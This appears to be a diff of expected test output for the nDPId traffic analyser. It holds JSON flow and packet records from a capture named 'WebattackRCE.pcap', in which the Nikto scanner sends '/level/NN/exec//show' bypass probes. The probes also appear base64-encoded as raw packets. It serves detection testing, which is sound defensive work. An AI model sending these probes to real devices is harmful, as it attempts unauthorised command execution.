+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":599,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277642,"flow_last_seen":1576420277642,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277642,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50760,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/51\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001298)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":600,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277644,"flow_last_seen":1576420277644,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277644,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50762,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":600,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_packet_id":1,"flow_last_seen":1576420277644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277644,"pkt":"AAAAAAAAAAAAAAAACABFAADIp2FAAEAGlMx\/AAABfwAAAcZKH5BZVp5d6Tz88YAYAED+vAAAAQEICp1m\/rSdZv60R0VUIC9sZXZlbC81Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjk5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":600,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277644,"flow_last_seen":1576420277644,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277644,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50762,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/52\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001299)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":600,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277644,"flow_last_seen":1576420277644,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277644,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50762,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/52\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001299)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":601,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277646,"flow_last_seen":1576420277646,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277646,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50764,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_packet_id":1,"flow_last_seen":1576420277646,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277646,"pkt":"AAAAAAAAAAAAAAAACABFAADIRMlAAEAG92R\/AAABfwAAAcZMH5Ck2n3FkPG1\/IAYAED+vAAAAQEICp1m\/radZv62R0VUIC9sZXZlbC81My9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":601,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277646,"flow_last_seen":1576420277646,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277646,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50764,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/53\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001300)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":601,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277646,"flow_last_seen":1576420277646,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277646,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50764,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/53\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001300)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":602,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277648,"flow_last_seen":1576420277648,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277648,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50766,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":602,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_packet_id":1,"flow_last_seen":1576420277648,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277648,"pkt":"AAAAAAAAAAAAAAAACABFAADIfG5AAEAGv79\/AAABfwAAAcZOH5Bk90VplsnARIAYAED+vAAAAQEICp1m\/ridZv64R0VUIC9sZXZlbC81NC9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":602,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277648,"flow_last_seen":1576420277648,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277648,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50766,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/54\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001301)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":602,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277648,"flow_last_seen":1576420277648,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277648,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50766,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/54\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001301)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":603,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277650,"flow_last_seen":1576420277650,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277650,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50768,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":603,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_packet_id":1,"flow_last_seen":1576420277650,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277650,"pkt":"AAAAAAAAAAAAAAAACABFAADIGk5AAEAGIeB\/AAABfwAAAcZQH5A3JSNJK84\/noAYAED+vAAAAQEICp1m\/rmdZv65R0VUIC9sZXZlbC81NS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":603,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277650,"flow_last_seen":1576420277650,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277650,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50768,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/55\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001302)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":603,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277650,"flow_last_seen":1576420277650,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277650,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50768,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/55\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001302)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":604,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277657,"flow_last_seen":1576420277657,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277657,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50770,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":1,"flow_last_seen":1576420277657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277657,"pkt":"AAAAAAAAAAAAAAAACABFAADIqGlAAEAGk8R\/AAABfwAAAcZSH5BRNZFiv2NJXIAYAED+vAAAAQEICp1m\/sGdZv7AR0VUIC9sZXZlbC81Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277657,"flow_last_seen":1576420277657,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277657,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50770,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/56\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001303)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277657,"flow_last_seen":1576420277657,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277657,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50770,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/56\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001303)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":605,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277658,"flow_last_seen":1576420277658,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277658,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50772,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_packet_id":1,"flow_last_seen":1576420277658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277658,"pkt":"AAAAAAAAAAAAAAAACABFAADIKidAAEAGEgd\/AAABfwAAAcZUH5DRhBMk1ziDVIAYAED+vAAAAQEICp1m\/sKdZv7CR0VUIC9sZXZlbC81Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMDQpDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":605,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277658,"flow_last_seen":1576420277658,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277658,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50772,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/57\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001304)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":605,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277658,"flow_last_seen":1576420277658,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277658,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50772,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/57\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001304)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":606,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277660,"flow_last_seen":1576420277660,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50774,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":606,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_packet_id":1,"flow_last_seen":1576420277660,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277660,"pkt":"AAAAAAAAAAAAAAAACABFAADI7vpAAEAGTTN\/AAABfwAAAcZWH5Ba4NgASBBLBYAYAED+vAAAAQEICp1m\/sSdZv7ER0VUIC9sZXZlbC81OC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzA1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":606,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277660,"flow_last_seen":1576420277660,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50774,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/58\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001305)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":606,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277660,"flow_last_seen":1576420277660,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50774,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/58\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001305)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":607,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277662,"flow_last_seen":1576420277662,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50776,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_packet_id":1,"flow_last_seen":1576420277662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277662,"pkt":"AAAAAAAAAAAAAAAACABFAADIlWJAAEAGpst\/AAABfwAAAcZYH5ApQaxoF8oWWYAYAED+vAAAAQEICp1m\/sadZv7GR0VUIC9sZXZlbC81OS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzA2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277662,"flow_last_seen":1576420277662,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50776,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/59\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001306)"}}
